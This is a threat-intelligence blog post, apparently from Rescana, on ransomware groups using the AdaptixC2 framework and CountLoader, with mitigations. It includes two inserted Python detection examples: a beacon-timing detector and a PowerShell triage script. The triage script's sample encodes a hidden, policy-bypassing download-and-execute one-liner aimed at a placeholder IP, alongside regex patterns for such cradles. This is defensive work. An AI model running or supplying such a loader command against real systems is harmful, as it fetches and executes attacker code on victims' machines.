
Russian Ransomware Groups Weaponize AdaptixC2: Advanced Attacks Targeting Windows, Linux, and macOS Systems

  • Rescana
  • 2 days ago
  • 4 min read


Executive Summary

Russian ransomware gangs have escalated their operational sophistication by weaponizing the open-source AdaptixC2 command-and-control (C2) framework. Originally developed for legitimate red teaming and penetration testing, AdaptixC2 has been adopted quickly by threat actors because of its modular, cross-platform architecture, encrypted agent communications, and flexible post-exploitation capabilities. Public reporting from Silent Push and Palo Alto Networks Unit 42 ties groups such as Akira and Fog to campaigns in which AdaptixC2 supports post-compromise access, lateral movement, and ransomware deployment, typically delivered by the CountLoader loader after a social engineering lure. The abuse of AdaptixC2 exemplifies the growing risk posed by dual-use open-source security tooling and underscores the need for organizations to strengthen detection, response, and threat intelligence capabilities.

Threat Actor Profile

The primary actors abusing AdaptixC2 are Russian-speaking ransomware gangs, notably those associated with the Akira and Fog ransomware families. These groups are characterized by technical agility, rapid adoption of emerging tools, and reliance on Initial Access Brokers (IABs) who sell entry into target environments. The developer of AdaptixC2, known as “RalfHacker,” maintains a significant presence on Telegram (RalfHackerChannel) and X (formerly Twitter), where releases and usage guidance reach a large Russian-speaking audience that includes the operators now abusing the framework. The actors’ targeting is opportunistic, spanning a broad range of industries and geographies with a particular concentration in North America and Europe. Their campaigns rely on phishing, fake IT-support social engineering, and AI-generated scripts to get past traditional security controls and establish persistent, covert access.

Technical Analysis of Malware/TTPs

AdaptixC2 is a modular, open-source C2 framework first published on GitHub in August 2024 by “RalfHacker.” The team server is written in Go; the operator GUI client is written in C++ on the Qt framework and runs on Windows, Linux, and macOS. Communications are encrypted, with support for mTLS, HTTP, SMB, and BTCP (beacon-over-TCP) channels; the SMB (named pipe) and TCP agents are built for peer-to-peer chaining through an already-compromised host, so the HTTP channel is normally the only one that appears as egress traffic. Other features include remote command execution, credential and screenshot management, a remote terminal, and extensible post-exploitation modules.

Weaponization of AdaptixC2 typically begins with delivery via the CountLoader malware loader, which is distributed through phishing emails, fake IT-support calls (notably over Microsoft Teams), and AI-generated PowerShell scripts. Once the agent is running, it beacons to the team server over an encrypted channel, and operators use it to execute commands, escalate privileges, harvest credentials, and move laterally. Support for multiple listener types and encrypted transports gives the operators resilient, low-profile persistence, while the modular design lets them change agent profiles and indicators quickly as defenses adapt.

Beyond the code itself, the framework’s reach is amplified by the developer’s Telegram channel, where releases and usage guidance are posted, and by its promotion on Russian-language cybercriminal forums. Because AdaptixC2 is open source and easy to customize (listeners, agent profiles, and extensions), ransomware operators can retool it faster than defenders can write signatures, which has accelerated its adoption among crews seeking to evade detection and maximize operational flexibility.

Exploitation in the Wild

Since Q3 2025, there has been a marked increase in the use of AdaptixC2 in ransomware campaigns, as documented by threat intelligence firms such as Silent Push and Palo Alto Networks Unit 42. The Akira and Fog ransomware groups have been observed leveraging AdaptixC2 for post-exploitation activity, including privilege escalation, lateral movement, and deployment of ransomware payloads. Initial access is frequently obtained via CountLoader, delivered through phishing campaigns, fake help desk interactions, and PowerShell scripts that show hallmarks of AI generation.

Notable campaigns have exploited Microsoft Teams as a vector for social engineering, with attackers posing as IT support to trick users into executing loader malware. Once inside the network, AdaptixC2 is used to establish encrypted C2 channels, execute commands, and deploy ransomware. The use of Telegram channels such as RalfHackerChannel (with over 28,000 subscribers) facilitates coordination, tool distribution, and operational updates among Russian-speaking threat actors.

The opportunistic nature of these campaigns means that a wide range of sectors—including critical infrastructure, healthcare, education, and manufacturing—are at risk. The global reach of these operations is amplified by the use of IABs, who sell access to compromised networks to ransomware operators.

Victimology and Targeting

While specific victim organizations are not always publicly disclosed, analysis of ransomware leak sites, threat intelligence reports, and underground forums indicates that the primary targets of AdaptixC2-enabled campaigns are organizations in North America and Europe. The affected sectors include critical infrastructure, healthcare, education, manufacturing, and financial services. The selection of victims is often opportunistic, driven by the availability of exploitable vulnerabilities and the potential for high ransom payouts.

The social engineering path, a Teams call from a fake help desk that walks the user through running the loader, sidesteps email security controls entirely, and the use of CountLoader with freshly generated PowerShell scripts reduces the chance that endpoint signatures recognize the payload. Reliance on collaboration platforms such as Microsoft Teams further broadens the attack surface and raises the risk for organizations with remote or hybrid workforces.

Mitigation and Countermeasures

To defend against AdaptixC2 and the ransomware campaigns built on it, organizations should layer controls rather than rely on any single signature. On the network, watch for periodic outbound HTTP(S) connections to newly seen or low-reputation hosts, since the HTTP agent is the one that normally leaves the network; the SMB (named pipe) and BTCP agents chain through already-compromised internal hosts, so they appear as east-west traffic and should be hunted in internal SMB and unusual host-to-host TCP telemetry instead. Because agent profiles (URIs, headers, user agent) are operator-configurable, behavioral analytics that flag regular beaconing intervals and anomalous command execution are more durable than content signatures.
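As an added illustration (not from the Rescana article or the AdaptixC2 project), the following Python implements the periodicity check behind such beacon detection over a handful of constructed proxy log lines: it groups connections by source/destination pair, measures the gaps between successive connections, and flags pairs whose gaps are near-constant, regardless of URI or user agent. Host names, addresses, and thresholds are invented for the example.

```python
"""Beacon-candidate detection over constructed proxy log lines.

Added example, not code from the article or from AdaptixC2. It looks only
at timing: a host that contacts the same destination at a near-constant
interval (with some jitter) is a beacon candidate whatever the payload is.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Line format (constructed): "ISO-timestamp src_ip dst_host:port method uri"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<method>\S+)\s+(?P<uri>\S+)$"
)

# Constructed sample: 10.0.0.15 beacons to cdn-assets.example every ~60 s
# (+/- a few seconds of jitter); 10.0.0.22 is ordinary bursty browsing;
# the two intranet hits show why a minimum sample size is needed.
SAMPLE_LOG = """\
2025-10-01T09:00:00 10.0.0.15 cdn-assets.example:443 GET /api/v1/health
2025-10-01T09:00:05 10.0.0.22 news.example:443 GET /
2025-10-01T09:00:07 10.0.0.22 news.example:443 GET /static/app.js
2025-10-01T09:00:58 10.0.0.15 cdn-assets.example:443 GET /api/v1/health
2025-10-01T09:02:01 10.0.0.15 cdn-assets.example:443 GET /api/v1/health
2025-10-01T09:02:30 10.0.0.15 intranet.example:80 GET /portal
2025-10-01T09:02:59 10.0.0.15 cdn-assets.example:443 GET /api/v1/health
2025-10-01T09:03:40 10.0.0.22 news.example:443 GET /sports
2025-10-01T09:04:02 10.0.0.15 cdn-assets.example:443 GET /api/v1/health
2025-10-01T09:04:58 10.0.0.15 cdn-assets.example:443 GET /api/v1/health
2025-10-01T09:06:01 10.0.0.15 cdn-assets.example:443 GET /api/v1/health
2025-10-01T09:06:59 10.0.0.15 cdn-assets.example:443 GET /api/v1/health
2025-10-01T09:15:12 10.0.0.22 news.example:443 GET /world
2025-10-01T09:15:13 10.0.0.22 news.example:443 GET /static/app.js
2025-10-01T09:47:02 10.0.0.22 news.example:443 GET /
2025-10-01T09:50:00 10.0.0.15 intranet.example:80 GET /portal
"""


def parse_log(text):
    """Parse log lines into (timestamp, src, dst) tuples; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # do not let one garbled line abort the whole hunt
        events.append((datetime.fromisoformat(m["ts"]), m["src"], m["dst"]))
    return events


def find_beacon_candidates(events, min_events=6, max_cv=0.2,
                           min_interval=5.0, max_interval=3600.0):
    """Return (src, dst) pairs whose inter-connection gaps are near-constant.

    Regularity is measured as the coefficient of variation (stdev / mean) of
    the gaps; jittered beacons still score low, human browsing scores high.
    min_events stops two-hit pairs from yielding a meaningless stdev of 0,
    and the interval bounds drop sub-second chatter and once-a-day jobs.
    Results are sorted most regular first.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in events:
        by_pair[(src, dst)].append(ts)

    candidates = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if not (min_interval <= avg <= max_interval):
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            candidates.append({"src": src, "dst": dst, "count": len(stamps),
                               "mean_interval_s": round(avg, 1),
                               "cv": round(cv, 3)})
    return sorted(candidates, key=lambda c: c["cv"])


if __name__ == "__main__":
    for c in find_beacon_candidates(parse_log(SAMPLE_LOG)):
        print(f"{c['src']} -> {c['dst']}: {c['count']} hits, "
              f"~{c['mean_interval_s']}s apart, cv={c['cv']}")
```

Run against real proxy or firewall exports, the same grouping works on (source, destination, destination port) keys; tune `max_cv` upward if operators are known to use wide jitter, and allowlist known update agents and monitoring probes, which are the usual legitimate sources of low-variance periodic traffic.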

Security teams should proactively hunt for CountLoader and AdaptixC2 artifacts using the YARA rules and network indicators published by threat intelligence sources such as Silent Push, while treating any single indicator as perishable given how easily the framework is reconfigured. Monitoring for new or unauthorized PowerShell execution, in particular launches with hidden windows, execution-policy bypass or encoded commands, and scripts that fetch and run remote content, is critical for catching the loader stage before a full agent is deployed; scripts showing signs of obfuscation or of AI generation (unusually verbose comments and boilerplate structure, as noted in public reporting) warrant review.
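The following Python is an added example (again not part of the original article, and not a published rule set) of a first-pass triage for PowerShell command lines and scripts of the kind described: it scores launch flags and download cradles commonly paired with loaders, and decodes -EncodedCommand payloads (base64 of UTF-16LE text) so the decoded body is scored as well. Both scripts it checks are constructed for the example, as are the indicator names and weights; the IP address is from the documentation range.

```python
"""PowerShell command-line / script triage with encoded-command unwrapping.

Added example, not code from the article, Silent Push, or Unit 42. Real
hunting would feed this from process-creation (4688 / Sysmon 1) events or
script-block logs; here the inputs are constructed strings.
"""
import base64
import re

# (name, pattern, weight): weights are illustrative, not a calibrated model.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("bypass_execpolicy", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 2),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("download_cradle", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|iwr\b|curl\b", re.I), 2),
    ("frombase64", re.compile(r"frombase64string", re.I), 2),
    ("char_casting", re.compile(r"\[char\]\s*\d+", re.I), 1),
]
# -enc / -EncodedCommand / -ec followed by a base64 blob of at least 20 chars
ENCODED = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(blob):
    """-EncodedCommand payloads are UTF-16LE text, base64 encoded."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(script, depth=0):
    """Return (score, hits). Decoded encoded commands are scored recursively,
    with their hits prefixed 'decoded:'; depth is capped against nesting loops."""
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(script):
            hits.append(name)
            score += weight
    for m in ENCODED.finditer(script):
        decoded = decode_encoded_command(m.group(1))
        if decoded is None:
            hits.append("undecodable_encoded_command")  # still worth a look
            score += 1
            continue
        hits.append("encoded_command")
        score += 2
        if depth < 3:
            inner_score, inner_hits = triage(decoded, depth + 1)
            score += inner_score
            hits.extend(f"decoded:{h}" for h in inner_hits)
    return score, hits


# Constructed benign admin script: should score 0.
BENIGN = r"""
# Rotate IIS logs older than 30 days
Get-ChildItem C:\inetpub\logs -Recurse -Filter *.log |
  Where-Object { $_.LastWriteTime -lt (Get-Date).AddDays(-30) } |
  Remove-Item -Force
"""

# Constructed loader-style one-liner: the cradle is hidden inside -enc,
# so only unwrapping it reveals the IEX + DownloadString pair.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SUSPICIOUS = ("powershell.exe -nop -w hidden -ep bypass -enc "
              + base64.b64encode(INNER.encode("utf-16-le")).decode())

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        score, hits = triage(sample)
        print(f"{label}: score={score} hits={hits}")
```

A score threshold alone will produce false positives from legitimate deployment tooling that also uses `-nop -w hidden`; in practice the hits list is what an analyst reads, and anything with a decoded download cradle should be escalated regardless of total score.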

Blocking known C2 infrastructure and keeping threat intelligence feeds current will reduce exposure; the developer’s public Telegram channel is itself a useful source for tracking new releases and features that may change indicators, since blocking the channel is rarely practical at the organizational level. Regular security awareness training, focused on phishing and on unsolicited “IT support” contact through Microsoft Teams, is essential to reduce initial access. Finally, incident response plans should be tested and updated regularly against the evolving tactics, techniques, and procedures (TTPs) of ransomware operators.

About Rescana

Rescana delivers advanced third-party risk management (TPRM) solutions, empowering organizations to proactively identify, assess, and mitigate cyber risks across their extended supply chain. Our platform leverages cutting-edge threat intelligence, automation, and analytics to provide actionable insights and enhance organizational resilience against emerging threats. For more information or to discuss how Rescana can support your cybersecurity strategy, we are happy to answer questions at ops@rescana.com.
